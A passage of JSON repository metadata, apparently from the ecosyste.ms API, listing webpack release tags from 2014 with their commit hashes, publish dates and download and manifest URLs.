at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/